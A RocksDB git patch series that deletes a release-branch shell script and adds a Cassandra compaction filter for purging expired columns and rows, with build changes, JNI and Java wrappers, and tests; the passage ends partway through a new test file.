 build_tools/make_new_version.sh | 53 ---------------------------------
 1 file changed, 53 deletions(-)
 delete mode 100755 build_tools/make_new_version.sh

diff --git a/build_tools/make_new_version.sh b/build_tools/make_new_version.sh
deleted file mode 100755
index edcb36c1f93..00000000000
--- a/build_tools/make_new_version.sh
+++ /dev/null
@@ -1,53 +0,0 @@
-#!/bin/bash
-# Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-# This source code is licensed under the BSD-style license found in the
-# LICENSE file in the root directory of this source tree. An additional grant
-# of patent rights can be found in the PATENTS file in the same directory.
-
-set -e
-if [ -z "$GIT" ]
-then
-  GIT="git"
-fi
-
-# Print out the colored progress info so that it can be brainlessly
-# distinguished by users.
-function title() {
-  echo -e "\033[1;32m$*\033[0m"
-}
-
-usage="Create new RocksDB version and prepare it for the release process\n"
-usage+="USAGE: ./make_new_version.sh <version> [<remote>]\n"
-usage+="  version: specify a version without '.fb' suffix (e.g. 5.4).\n"
-usage+="  remote: name of the remote to push the branch to (default: origin)."
-
-# -- Pre-check
-if [[ $# < 1 ]]; then
-  echo -e $usage
-  exit 1
-fi
-
-ROCKSDB_VERSION=$1
-
-REMOTE="origin"
-if [[ $# > 1 ]]; then
-  REMOTE=$2
-fi
-
-GIT_BRANCH=`git rev-parse --abbrev-ref HEAD`
-echo $GIT_BRANCH
-
-if [ $GIT_BRANCH != "master" ]; then
-  echo "Error: Current branch is '$GIT_BRANCH', Please switch to master branch."
-  exit 1
-fi
-
-title "Adding new tag for this release ..."
-BRANCH="$ROCKSDB_VERSION.fb"
-$GIT checkout -b $BRANCH
-
-# Setting up the proxy for remote repo access
-title "Pushing new branch to remote repo ..."
-git push $REMOTE --set-upstream $BRANCH
-
-title "Branch $BRANCH is pushed to github;"

From 534c255c7ab7ba73aaab1f82f8c1a92388eab00e Mon Sep 17 00:00:00 2001
From: Pengchao Wang
Date: Fri, 21 Jul 2017 14:42:32 -0700
Subject: [PATCH 024/205] Cassandra compaction filter for purge expired columns
 and rows

Summary:
Major changes in this PR:
* Implement CassandraCompactionFilter to remove expired columns and rows (if all columns expired; see the sketch after this list)
* Move cassandra related code from utilities/merge_operators/cassandra to utilities/cassandra/*
* Switch from unique_ptr to shared_ptr<> for Column membership management in RowValue. Since columns have multiple owners in the Merge and GC process, using shared_ptr helps make RowValue immutable.
* Rename cassandra_merge_test to cassandra_functional_test and add two TTL compaction related tests there.
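As a rough sketch of the purge decision the new filter applies during compaction (toy types only; the real implementation lives in utilities/cassandra/cassandra_compaction_filter.cc and format.cc and plugs into RocksDB through the CompactionFilter interface, so every name below is illustrative):

```cpp
#include <algorithm>
#include <cstdint>
#include <vector>

// Hypothetical stand-in for a deserialized Cassandra column: `expire_at` is
// an absolute expiration time in seconds, with 0 meaning no TTL was set.
struct ToyColumn {
  int64_t expire_at;
};

// Mirrors the three outcomes a compaction filter can report for a row:
// keep it as-is, rewrite it with expired columns dropped, or remove it.
enum class RowDecision { kKeep, kRewrite, kRemove };

RowDecision PurgeExpiredColumns(std::vector<ToyColumn>* row, int64_t now) {
  const size_t before = row->size();
  row->erase(std::remove_if(row->begin(), row->end(),
                            [now](const ToyColumn& c) {
                              return c.expire_at != 0 && c.expire_at <= now;
                            }),
             row->end());
  if (row->empty()) {
    return RowDecision::kRemove;  // every column expired: drop the whole row
  }
  return row->size() == before ? RowDecision::kKeep : RowDecision::kRewrite;
}

int main() {
  std::vector<ToyColumn> row = {{100}, {0}};
  // At time 150 the first column is expired but the second (no TTL) survives,
  // so the row is rewritten rather than removed.
  return PurgeExpiredColumns(&row, 150) == RowDecision::kRewrite ? 0 : 1;
}
```

In CompactionFilter terms, kRewrite corresponds to handing back a re-serialized row as the new value, and kRemove to filtering the key out of the compaction output entirely.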
Closes https://github.com/facebook/rocksdb/pull/2588 Differential Revision: D5430010 Pulled By: wpc fbshipit-source-id: 9566c21e06de17491d486a68c70f52d501f27687 --- CMakeLists.txt | 15 +- Makefile | 10 +- TARGETS | 17 +- java/CMakeLists.txt | 3 + java/Makefile | 1 + .../rocksjni/cassandra_compactionfilterjni.cc | 22 ++ java/rocksjni/cassandra_value_operator.cc | 2 +- .../rocksdb/CassandraCompactionFilter.java | 18 ++ src.mk | 16 +- .../cassandra/cassandra_compaction_filter.cc | 47 ++++ .../cassandra/cassandra_compaction_filter.h | 39 +++ .../cassandra/cassandra_format_test.cc | 71 ++++- .../cassandra/cassandra_functional_test.cc | 251 ++++++++++++++++++ .../cassandra/cassandra_row_merge_test.cc | 6 +- .../cassandra/cassandra_serialize_test.cc | 4 +- .../{merge_operators => }/cassandra/format.cc | 104 ++++++-- .../{merge_operators => }/cassandra/format.h | 61 +++-- .../cassandra/merge_operator.cc | 2 +- .../cassandra/merge_operator.h | 0 .../cassandra/serialize.h | 0 .../cassandra/test_utils.cc | 24 +- .../cassandra/test_utils.h | 10 +- .../cassandra/cassandra_merge_test.cc | 134 ---------- 23 files changed, 617 insertions(+), 240 deletions(-) create mode 100644 java/rocksjni/cassandra_compactionfilterjni.cc create mode 100644 java/src/main/java/org/rocksdb/CassandraCompactionFilter.java create mode 100644 utilities/cassandra/cassandra_compaction_filter.cc create mode 100644 utilities/cassandra/cassandra_compaction_filter.h rename utilities/{merge_operators => }/cassandra/cassandra_format_test.cc (80%) create mode 100644 utilities/cassandra/cassandra_functional_test.cc rename utilities/{merge_operators => }/cassandra/cassandra_row_merge_test.cc (92%) rename utilities/{merge_operators => }/cassandra/cassandra_serialize_test.cc (96%) rename utilities/{merge_operators => }/cassandra/format.cc (75%) rename utilities/{merge_operators => }/cassandra/format.h (80%) rename utilities/{merge_operators => }/cassandra/merge_operator.cc (98%) rename utilities/{merge_operators => }/cassandra/merge_operator.h (100%) rename utilities/{merge_operators => }/cassandra/serialize.h (100%) rename utilities/{merge_operators => }/cassandra/test_utils.cc (73%) rename utilities/{merge_operators => }/cassandra/test_utils.h (82%) delete mode 100644 utilities/merge_operators/cassandra/cassandra_merge_test.cc diff --git a/CMakeLists.txt b/CMakeLists.txt index 2d56c8d7daf..1eb98b2265b 100644 --- a/CMakeLists.txt +++ b/CMakeLists.txt @@ -482,6 +482,9 @@ set(SOURCES utilities/blob_db/blob_log_reader.cc utilities/blob_db/blob_log_writer.cc utilities/blob_db/blob_log_format.cc + utilities/cassandra/cassandra_compaction_filter.cc + utilities/cassandra/format.cc + utilities/cassandra/merge_operator.cc utilities/checkpoint/checkpoint_impl.cc utilities/col_buf_decoder.cc utilities/col_buf_encoder.cc @@ -500,8 +503,6 @@ set(SOURCES utilities/memory/memory_util.cc utilities/merge_operators/max.cc utilities/merge_operators/put.cc - utilities/merge_operators/cassandra/format.cc - utilities/merge_operators/cassandra/merge_operator.cc utilities/merge_operators/string_append/stringappend.cc utilities/merge_operators/string_append/stringappend2.cc utilities/merge_operators/uint64add.cc @@ -705,6 +706,10 @@ set(TESTS util/thread_local_test.cc utilities/backupable/backupable_db_test.cc utilities/blob_db/blob_db_test.cc + utilities/cassandra/cassandra_functional_test.cc + utilities/cassandra/cassandra_format_test.cc + utilities/cassandra/cassandra_row_merge_test.cc + utilities/cassandra/cassandra_serialize_test.cc 
utilities/checkpoint/checkpoint_test.cc utilities/column_aware_encoding_test.cc utilities/date_tiered/date_tiered_test.cc @@ -713,10 +718,6 @@ set(TESTS utilities/geodb/geodb_test.cc utilities/lua/rocks_lua_test.cc utilities/memory/memory_test.cc - utilities/merge_operators/cassandra/cassandra_merge_test.cc - utilities/merge_operators/cassandra/cassandra_format_test.cc - utilities/merge_operators/cassandra/cassandra_row_merge_test.cc - utilities/merge_operators/cassandra/cassandra_serialize_test.cc utilities/merge_operators/string_append/stringappend_test.cc utilities/object_registry_test.cc utilities/option_change_migration/option_change_migration_test.cc @@ -757,7 +758,7 @@ set(TESTUTIL_SOURCE monitoring/thread_status_updater_debug.cc table/mock_table.cc util/fault_injection_test_env.cc - utilities/merge_operators/cassandra/test_utils.cc + utilities/cassandra/test_utils.cc ) # test utilities are only build in debug enable_testing() diff --git a/Makefile b/Makefile index 1b273224b22..c40d741d7a8 100644 --- a/Makefile +++ b/Makefile @@ -405,7 +405,7 @@ TESTS = \ write_buffer_manager_test \ stringappend_test \ cassandra_format_test \ - cassandra_merge_test \ + cassandra_functional_test \ cassandra_row_merge_test \ cassandra_serialize_test \ ttl_test \ @@ -1000,16 +1000,16 @@ option_change_migration_test: utilities/option_change_migration/option_change_mi stringappend_test: utilities/merge_operators/string_append/stringappend_test.o $(LIBOBJECTS) $(TESTHARNESS) $(AM_LINK) -cassandra_format_test: utilities/merge_operators/cassandra/cassandra_format_test.o $(LIBOBJECTS) $(TESTHARNESS) +cassandra_format_test: utilities/cassandra/cassandra_format_test.o utilities/cassandra/test_utils.o $(LIBOBJECTS) $(TESTHARNESS) $(AM_LINK) -cassandra_merge_test: utilities/merge_operators/cassandra/cassandra_merge_test.o utilities/merge_operators/cassandra/test_utils.o $(LIBOBJECTS) $(TESTHARNESS) +cassandra_functional_test: utilities/cassandra/cassandra_functional_test.o utilities/cassandra/test_utils.o $(LIBOBJECTS) $(TESTHARNESS) $(AM_LINK) -cassandra_row_merge_test: utilities/merge_operators/cassandra/cassandra_row_merge_test.o utilities/merge_operators/cassandra/test_utils.o $(LIBOBJECTS) $(TESTHARNESS) +cassandra_row_merge_test: utilities/cassandra/cassandra_row_merge_test.o utilities/cassandra/test_utils.o $(LIBOBJECTS) $(TESTHARNESS) $(AM_LINK) -cassandra_serialize_test: utilities/merge_operators/cassandra/cassandra_serialize_test.o $(LIBOBJECTS) $(TESTHARNESS) +cassandra_serialize_test: utilities/cassandra/cassandra_serialize_test.o $(LIBOBJECTS) $(TESTHARNESS) $(AM_LINK) redis_test: utilities/redis/redis_lists_test.o $(LIBOBJECTS) $(TESTHARNESS) diff --git a/TARGETS b/TARGETS index 1bafb01caa0..134bb5081d3 100644 --- a/TARGETS +++ b/TARGETS @@ -212,6 +212,9 @@ cpp_library( "utilities/blob_db/blob_log_reader.cc", "utilities/blob_db/blob_log_writer.cc", "utilities/blob_db/blob_log_format.cc", + "utilities/cassandra/cassandra_compaction_filter.cc", + "utilities/cassandra/format.cc", + "utilities/cassandra/merge_operator.cc", "utilities/checkpoint/checkpoint_impl.cc", "utilities/compaction_filters/remove_emptyvalue_compactionfilter.cc", "utilities/convenience/info_log_finder.cc", @@ -226,8 +229,6 @@ cpp_library( "utilities/leveldb_options/leveldb_options.cc", "utilities/lua/rocks_lua_compaction_filter.cc", "utilities/memory/memory_util.cc", - "utilities/merge_operators/cassandra/format.cc", - "utilities/merge_operators/cassandra/merge_operator.cc", "utilities/merge_operators/max.cc", 
"utilities/merge_operators/put.cc", "utilities/merge_operators/string_append/stringappend.cc", @@ -275,7 +276,7 @@ cpp_library( "util/testharness.cc", "util/testutil.cc", "db/db_test_util.cc", - "utilities/merge_operators/cassandra/test_utils.cc", + "utilities/cassandra/test_utils.cc", "utilities/col_buf_encoder.cc", "utilities/col_buf_decoder.cc", "utilities/column_aware_encoding_util.cc", @@ -325,16 +326,16 @@ ROCKS_TESTS = [['arena_test', 'util/arena_test.cc', 'serial'], ['c_test', 'db/c_test.c', 'serial'], ['cache_test', 'cache/cache_test.cc', 'serial'], ['cassandra_format_test', - 'utilities/merge_operators/cassandra/cassandra_format_test.cc', + 'utilities/cassandra/cassandra_format_test.cc', 'serial'], - ['cassandra_merge_test', - 'utilities/merge_operators/cassandra/cassandra_merge_test.cc', + ['cassandra_functional_test', + 'utilities/cassandra/cassandra_functional_test.cc', 'serial'], ['cassandra_row_merge_test', - 'utilities/merge_operators/cassandra/cassandra_row_merge_test.cc', + 'utilities/cassandra/cassandra_row_merge_test.cc', 'serial'], ['cassandra_serialize_test', - 'utilities/merge_operators/cassandra/cassandra_serialize_test.cc', + 'utilities/cassandra/cassandra_serialize_test.cc', 'serial'], ['checkpoint_test', 'utilities/checkpoint/checkpoint_test.cc', 'serial'], ['cleanable_test', 'table/cleanable_test.cc', 'serial'], diff --git a/java/CMakeLists.txt b/java/CMakeLists.txt index 6a22cee265a..a34cda6ca85 100644 --- a/java/CMakeLists.txt +++ b/java/CMakeLists.txt @@ -24,6 +24,7 @@ set(JNI_NATIVE_SOURCES rocksjni/options.cc rocksjni/ratelimiterjni.cc rocksjni/remove_emptyvalue_compactionfilterjni.cc + rocksjni/cassandra_compactionfilterjni.cc rocksjni/restorejni.cc rocksjni/rocksdb_exception_test.cc rocksjni/rocksjni.cc @@ -55,6 +56,8 @@ set(NATIVE_JAVA_CLASSES org.rocksdb.BlockBasedTableConfig org.rocksdb.BloomFilter org.rocksdb.Cache + org.rocksdb.CassandraCompactionFilter + org.rocksdb.CassandraValueMergeOperator org.rocksdb.Checkpoint org.rocksdb.ClockCache org.rocksdb.ColumnFamilyHandle diff --git a/java/Makefile b/java/Makefile index 1210159af0a..b29447bd8a7 100644 --- a/java/Makefile +++ b/java/Makefile @@ -7,6 +7,7 @@ NATIVE_JAVA_CLASSES = org.rocksdb.AbstractCompactionFilter\ org.rocksdb.BloomFilter\ org.rocksdb.Checkpoint\ org.rocksdb.ClockCache\ + org.rocksdb.CassandraCompactionFilter\ org.rocksdb.CassandraValueMergeOperator\ org.rocksdb.ColumnFamilyHandle\ org.rocksdb.ColumnFamilyOptions\ diff --git a/java/rocksjni/cassandra_compactionfilterjni.cc b/java/rocksjni/cassandra_compactionfilterjni.cc new file mode 100644 index 00000000000..9d77559ab5d --- /dev/null +++ b/java/rocksjni/cassandra_compactionfilterjni.cc @@ -0,0 +1,22 @@ +// Copyright (c) 2011-present, Facebook, Inc. All rights reserved. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). 
+ +#include + +#include "include/org_rocksdb_CassandraCompactionFilter.h" +#include "utilities/cassandra/cassandra_compaction_filter.h" + +/* + * Class: org_rocksdb_CassandraCompactionFilter + * Method: createNewCassandraCompactionFilter0 + * Signature: ()J + */ +jlong Java_org_rocksdb_CassandraCompactionFilter_createNewCassandraCompactionFilter0( + JNIEnv* env, jclass jcls, jboolean purge_ttl_on_expiration) { + auto* compaction_filter = + new rocksdb::cassandra::CassandraCompactionFilter(purge_ttl_on_expiration); + // set the native handle to our native compaction filter + return reinterpret_cast(compaction_filter); +} diff --git a/java/rocksjni/cassandra_value_operator.cc b/java/rocksjni/cassandra_value_operator.cc index 889213b9c8a..6be6614075a 100644 --- a/java/rocksjni/cassandra_value_operator.cc +++ b/java/rocksjni/cassandra_value_operator.cc @@ -20,7 +20,7 @@ #include "rocksdb/table.h" #include "rocksdb/slice_transform.h" #include "rocksdb/merge_operator.h" -#include "utilities/merge_operators/cassandra/merge_operator.h" +#include "utilities/cassandra/merge_operator.h" /* * Class: org_rocksdb_CassandraValueMergeOperator diff --git a/java/src/main/java/org/rocksdb/CassandraCompactionFilter.java b/java/src/main/java/org/rocksdb/CassandraCompactionFilter.java new file mode 100644 index 00000000000..05d9aabcf00 --- /dev/null +++ b/java/src/main/java/org/rocksdb/CassandraCompactionFilter.java @@ -0,0 +1,18 @@ +// Copyright (c) 2011-present, Facebook, Inc. All rights reserved. +// This source code is licensed under the BSD-style license found in the +// LICENSE file in the root directory of this source tree. An additional grant +// of patent rights can be found in the PATENTS file in the same directory. + +package org.rocksdb; + +/** + * Just a Java wrapper around CassandraCompactionFilter implemented in C++ + */ +public class CassandraCompactionFilter + extends AbstractCompactionFilter { + public CassandraCompactionFilter(boolean purgeTtlOnExpiration) { + super(createNewCassandraCompactionFilter0(purgeTtlOnExpiration)); + } + + private native static long createNewCassandraCompactionFilter0(boolean purgeTtlOnExpiration); +} diff --git a/src.mk b/src.mk index 8250947f596..fb7f979396c 100644 --- a/src.mk +++ b/src.mk @@ -159,6 +159,9 @@ LIB_SOURCES = \ utilities/blob_db/blob_log_reader.cc \ utilities/blob_db/blob_log_writer.cc \ utilities/blob_db/blob_log_format.cc \ + utilities/cassandra/cassandra_compaction_filter.cc \ + utilities/cassandra/format.cc \ + utilities/cassandra/merge_operator.cc \ utilities/checkpoint/checkpoint_impl.cc \ utilities/compaction_filters/remove_emptyvalue_compactionfilter.cc \ utilities/convenience/info_log_finder.cc \ @@ -173,8 +176,6 @@ LIB_SOURCES = \ utilities/leveldb_options/leveldb_options.cc \ utilities/lua/rocks_lua_compaction_filter.cc \ utilities/memory/memory_util.cc \ - utilities/merge_operators/cassandra/format.cc \ - utilities/merge_operators/cassandra/merge_operator.cc \ utilities/merge_operators/max.cc \ utilities/merge_operators/put.cc \ utilities/merge_operators/string_append/stringappend.cc \ @@ -225,7 +226,7 @@ TEST_LIB_SOURCES = \ util/testharness.cc \ util/testutil.cc \ db/db_test_util.cc \ - utilities/merge_operators/cassandra/test_utils.cc \ + utilities/cassandra/test_utils.cc \ MAIN_SOURCES = \ cache/cache_bench.cc \ @@ -329,6 +330,10 @@ MAIN_SOURCES = \ util/thread_local_test.cc \ utilities/backupable/backupable_db_test.cc \ utilities/blob_db/blob_db_test.cc \ + utilities/cassandra/cassandra_format_test.cc \ + 
utilities/cassandra/cassandra_functional_test.cc \ + utilities/cassandra/cassandra_row_merge_test.cc \ + utilities/cassandra/cassandra_serialize_test.cc \ utilities/checkpoint/checkpoint_test.cc \ utilities/column_aware_encoding_exp.cc \ utilities/column_aware_encoding_test.cc \ @@ -339,10 +344,6 @@ MAIN_SOURCES = \ utilities/lua/rocks_lua_test.cc \ utilities/memory/memory_test.cc \ utilities/merge_operators/string_append/stringappend_test.cc \ - utilities/merge_operators/cassandra/cassandra_merge_test.cc \ - utilities/merge_operators/cassandra/cassandra_format_test.cc \ - utilities/merge_operators/cassandra/cassandra_row_merge_test.cc \ - utilities/merge_operators/cassandra/cassandra_serialize_test.cc \ utilities/object_registry_test.cc \ utilities/option_change_migration/option_change_migration_test.cc \ utilities/options/options_util_test.cc \ @@ -379,6 +380,7 @@ JNI_NATIVE_SOURCES = \ java/rocksjni/options.cc \ java/rocksjni/ratelimiterjni.cc \ java/rocksjni/remove_emptyvalue_compactionfilterjni.cc \ + java/rocksjni/cassandra_compactionfilterjni.cc \ java/rocksjni/restorejni.cc \ java/rocksjni/rocksjni.cc \ java/rocksjni/rocksdb_exception_test.cc \ diff --git a/utilities/cassandra/cassandra_compaction_filter.cc b/utilities/cassandra/cassandra_compaction_filter.cc new file mode 100644 index 00000000000..e817972ee35 --- /dev/null +++ b/utilities/cassandra/cassandra_compaction_filter.cc @@ -0,0 +1,47 @@ +// Copyright (c) 2011-present, Facebook, Inc. All rights reserved. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). + +#include "utilities/cassandra/cassandra_compaction_filter.h" +#include +#include "rocksdb/slice.h" +#include "utilities/cassandra/format.h" + + +namespace rocksdb { +namespace cassandra { + +const char* CassandraCompactionFilter::Name() const { + return "CassandraCompactionFilter"; +} + +CompactionFilter::Decision CassandraCompactionFilter::FilterV2( + int level, + const Slice& key, + ValueType value_type, + const Slice& existing_value, + std::string* new_value, + std::string* skip_until) const { + + bool value_changed = false; + RowValue row_value = RowValue::Deserialize( + existing_value.data(), existing_value.size()); + RowValue compacted = purge_ttl_on_expiration_ ? + row_value.PurgeTtl(&value_changed) : + row_value.ExpireTtl(&value_changed); + + if(compacted.Empty()) { + return Decision::kRemove; + } + + if (value_changed) { + compacted.Serialize(new_value); + return Decision::kChangeValue; + } + + return Decision::kKeep; +} + +} // namespace cassandra +} // namespace rocksdb diff --git a/utilities/cassandra/cassandra_compaction_filter.h b/utilities/cassandra/cassandra_compaction_filter.h new file mode 100644 index 00000000000..c09b8e74aa1 --- /dev/null +++ b/utilities/cassandra/cassandra_compaction_filter.h @@ -0,0 +1,39 @@ +// Copyright (c) 2011-present, Facebook, Inc. All rights reserved. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). + +#pragma once +#include +#include "rocksdb/compaction_filter.h" +#include "rocksdb/slice.h" + +namespace rocksdb { +namespace cassandra { + +/** + * Compaction filter for removing expired Cassandra data with ttl. + * If option `purge_ttl_on_expiration` is set to true, expired data + * will be directly purged. 
Otherwise expired data will be converted + * to tombstones first, then be eventually removed after the gc grace period. + * `purge_ttl_on_expiration` should only be on when all the + * writes have the same ttl setting, otherwise it could bring old data back. + */ +class CassandraCompactionFilter : public CompactionFilter { +public: + explicit CassandraCompactionFilter(bool purge_ttl_on_expiration) + : purge_ttl_on_expiration_(purge_ttl_on_expiration) {} + + const char* Name() const override; + virtual Decision FilterV2(int level, + const Slice& key, + ValueType value_type, + const Slice& existing_value, + std::string* new_value, + std::string* skip_until) const override; + +private: + bool purge_ttl_on_expiration_; +}; +} // namespace cassandra +} // namespace rocksdb diff --git a/utilities/merge_operators/cassandra/cassandra_format_test.cc b/utilities/cassandra/cassandra_format_test.cc similarity index 80% rename from utilities/merge_operators/cassandra/cassandra_format_test.cc rename to utilities/cassandra/cassandra_format_test.cc index 866098a1b09..0cf124d0cab 100644 --- a/utilities/merge_operators/cassandra/cassandra_format_test.cc +++ b/utilities/cassandra/cassandra_format_test.cc @@ -2,14 +2,13 @@ // This source code is licensed under both the GPLv2 (found in the // COPYING file in the root directory) and Apache 2.0 License // (found in the LICENSE.Apache file in the root directory). -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. #include #include #include "util/testharness.h" -#include "utilities/merge_operators/cassandra/format.h" -#include "utilities/merge_operators/cassandra/serialize.h" +#include "utilities/cassandra/format.h" +#include "utilities/cassandra/serialize.h" +#include "utilities/cassandra/test_utils.h" using namespace rocksdb::cassandra; @@ -46,7 +45,7 @@ TEST(ColumnTest, Column) { // Verify the deserialization. std::string saved_dest = dest; - std::unique_ptr c1 = Column::Deserialize(saved_dest.c_str(), 0); + std::shared_ptr c1 = Column::Deserialize(saved_dest.c_str(), 0); EXPECT_EQ(c1->Index(), index); EXPECT_EQ(c1->Timestamp(), timestamp); EXPECT_EQ(c1->Size(), 14 + sizeof(data)); @@ -58,7 +57,7 @@ TEST(ColumnTest, Column) { // Verify the ColumnBase::Deserialization. saved_dest = dest; - std::unique_ptr c2 = + std::shared_ptr c2 = ColumnBase::Deserialize(saved_dest.c_str(), c.Size()); c2->Serialize(&dest); EXPECT_EQ(dest.size(), 3 * c.Size()); @@ -101,7 +100,7 @@ TEST(ExpiringColumnTest, ExpiringColumn) { // Verify the deserialization. std::string saved_dest = dest; - std::unique_ptr c1 = + std::shared_ptr c1 = ExpiringColumn::Deserialize(saved_dest.c_str(), 0); EXPECT_EQ(c1->Index(), index); EXPECT_EQ(c1->Timestamp(), timestamp); @@ -114,7 +113,7 @@ - std::unique_ptr c2 = + std::shared_ptr c2 = ColumnBase::Deserialize(saved_dest.c_str(), c.Size()); c2->Serialize(&dest); EXPECT_EQ(dest.size(), 3 * c.Size()); @@ -151,7 +150,7 @@ TEST(TombstoneTest, Tombstone) { EXPECT_EQ(Deserialize(dest.c_str(), offset), marked_for_delete_at); // Verify the deserialization.
- std::unique_ptr c1 = Tombstone::Deserialize(dest.c_str(), 0); + std::shared_ptr c1 = Tombstone::Deserialize(dest.c_str(), 0); EXPECT_EQ(c1->Index(), index); EXPECT_EQ(c1->Timestamp(), marked_for_delete_at); EXPECT_EQ(c1->Size(), 14); @@ -162,7 +161,7 @@ TEST(TombstoneTest, Tombstone) { std::memcmp(dest.c_str(), dest.c_str() + c.Size(), c.Size()) == 0); // Verify the ColumnBase::Deserialization. - std::unique_ptr c2 = + std::shared_ptr c2 = ColumnBase::Deserialize(dest.c_str(), c.Size()); c2->Serialize(&dest); EXPECT_EQ(dest.size(), 3 * c.Size()); @@ -204,7 +203,7 @@ TEST(RowValueTest, RowTombstone) { } TEST(RowValueTest, RowWithColumns) { - std::vector> columns; + std::vector> columns; int64_t last_modified_time = 1494022807048; std::size_t columns_data_size = 0; @@ -212,7 +211,7 @@ TEST(RowValueTest, RowWithColumns) { int8_t e_index = 0; int64_t e_timestamp = 1494022807044; int32_t e_ttl = 3600; - columns.push_back(std::unique_ptr( + columns.push_back(std::shared_ptr( new ExpiringColumn(ColumnTypeMask::EXPIRATION_MASK, e_index, e_timestamp, sizeof(e_data), e_data, e_ttl))); columns_data_size += columns[0]->Size(); @@ -220,14 +219,14 @@ TEST(RowValueTest, RowWithColumns) { char c_data[4] = {'d', 'a', 't', 'a'}; int8_t c_index = 1; int64_t c_timestamp = 1494022807048; - columns.push_back(std::unique_ptr( + columns.push_back(std::shared_ptr( new Column(0, c_index, c_timestamp, sizeof(c_data), c_data))); columns_data_size += columns[1]->Size(); int8_t t_index = 2; int32_t t_local_deletion_time = 1494022801; int64_t t_marked_for_delete_at = 1494022807043; - columns.push_back(std::unique_ptr( + columns.push_back(std::shared_ptr( new Tombstone(ColumnTypeMask::DELETION_MASK, t_index, t_local_deletion_time, t_marked_for_delete_at))); columns_data_size += columns[2]->Size(); @@ -301,6 +300,50 @@ TEST(RowValueTest, RowWithColumns) { std::memcmp(dest.c_str(), dest.c_str() + r.Size(), r.Size()) == 0); } +TEST(RowValueTest, PurgeTtlShouldRemvoeAllColumnsExpired) { + int64_t now = time(nullptr); + + auto row_value = CreateTestRowValue({ + std::make_tuple(kColumn, 0, ToMicroSeconds(now)), + std::make_tuple(kExpiringColumn, 1, ToMicroSeconds(now - kTtl - 10)), //expired + std::make_tuple(kExpiringColumn, 2, ToMicroSeconds(now)), // not expired + std::make_tuple(kTombstone, 3, ToMicroSeconds(now)) + }); + + bool changed = false; + auto purged = row_value.PurgeTtl(&changed); + EXPECT_TRUE(changed); + EXPECT_EQ(purged.columns_.size(), 3); + VerifyRowValueColumns(purged.columns_, 0, kColumn, 0, ToMicroSeconds(now)); + VerifyRowValueColumns(purged.columns_, 1, kExpiringColumn, 2, ToMicroSeconds(now)); + VerifyRowValueColumns(purged.columns_, 2, kTombstone, 3, ToMicroSeconds(now)); + + purged.PurgeTtl(&changed); + EXPECT_FALSE(changed); +} + +TEST(RowValueTest, ExpireTtlShouldConvertExpiredColumnsToTombstones) { + int64_t now = time(nullptr); + + auto row_value = CreateTestRowValue({ + std::make_tuple(kColumn, 0, ToMicroSeconds(now)), + std::make_tuple(kExpiringColumn, 1, ToMicroSeconds(now - kTtl - 10)), //expired + std::make_tuple(kExpiringColumn, 2, ToMicroSeconds(now)), // not expired + std::make_tuple(kTombstone, 3, ToMicroSeconds(now)) + }); + + bool changed = false; + auto compacted = row_value.ExpireTtl(&changed); + EXPECT_TRUE(changed); + EXPECT_EQ(compacted.columns_.size(), 4); + VerifyRowValueColumns(compacted.columns_, 0, kColumn, 0, ToMicroSeconds(now)); + VerifyRowValueColumns(compacted.columns_, 1, kTombstone, 1, ToMicroSeconds(now - 10)); + VerifyRowValueColumns(compacted.columns_, 2, 
kExpiringColumn, 2, ToMicroSeconds(now)); + VerifyRowValueColumns(compacted.columns_, 3, kTombstone, 3, ToMicroSeconds(now)); + + compacted.ExpireTtl(&changed); + EXPECT_FALSE(changed); +} } // namespace cassandra } // namespace rocksdb diff --git a/utilities/cassandra/cassandra_functional_test.cc b/utilities/cassandra/cassandra_functional_test.cc new file mode 100644 index 00000000000..0c02228a7f9 --- /dev/null +++ b/utilities/cassandra/cassandra_functional_test.cc @@ -0,0 +1,251 @@ +// Copyright (c) 2017-present, Facebook, Inc. All rights reserved. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). + +#include +#include "rocksdb/db.h" +#include "db/db_impl.h" +#include "rocksdb/merge_operator.h" +#include "rocksdb/utilities/db_ttl.h" +#include "util/testharness.h" +#include "util/random.h" +#include "utilities/merge_operators.h" +#include "utilities/cassandra/cassandra_compaction_filter.h" +#include "utilities/cassandra/merge_operator.h" +#include "utilities/cassandra/test_utils.h" + +using namespace rocksdb; + +namespace rocksdb { +namespace cassandra { + +// Path to the database on file system +const std::string kDbName = test::TmpDir() + "/cassandra_functional_test"; + +class CassandraStore { + public: + explicit CassandraStore(std::shared_ptr db) + : db_(db), + merge_option_(), + get_option_() { + assert(db); + } + + bool Append(const std::string& key, const RowValue& val){ + std::string result; + val.Serialize(&result); + Slice valSlice(result.data(), result.size()); + auto s = db_->Merge(merge_option_, key, valSlice); + + if (s.ok()) { + return true; + } else { + std::cerr << "ERROR " << s.ToString() << std::endl; + return false; + } + } + + void Flush() { + dbfull()->TEST_FlushMemTable(); + dbfull()->TEST_WaitForCompact(); + } + + void Compact() { + dbfull()->TEST_CompactRange( + 0, nullptr, nullptr, db_->DefaultColumnFamily()); + } + + std::tuple Get(const std::string& key){ + std::string result; + auto s = db_->Get(get_option_, key, &result); + + if (s.ok()) { + return std::make_tuple(true, + RowValue::Deserialize(result.data(), + result.size())); + } + + if (!s.IsNotFound()) { + std::cerr << "ERROR " << s.ToString() << std::endl; + } + + return std::make_tuple(false, RowValue(0, 0)); + } + + private: + std::shared_ptr db_; + WriteOptions merge_option_; + ReadOptions get_option_; + + DBImpl* dbfull() { return reinterpret_cast(db_.get()); } + +}; + +class TestCompactionFilterFactory : public CompactionFilterFactory { +public: + explicit TestCompactionFilterFactory(bool purge_ttl_on_expiration) + : purge_ttl_on_expiration_(purge_ttl_on_expiration) {} + + virtual std::unique_ptr CreateCompactionFilter( + const CompactionFilter::Context& context) override { + return unique_ptr(new CassandraCompactionFilter(purge_ttl_on_expiration_)); + } + + virtual const char* Name() const override { + return "TestCompactionFilterFactory"; + } + +private: + bool purge_ttl_on_expiration_; +}; + + +// The class for unit-testing +class CassandraFunctionalTest : public testing::Test { +public: + CassandraFunctionalTest() { + DestroyDB(kDbName, Options()); // Start each test with a fresh DB + } + + std::shared_ptr 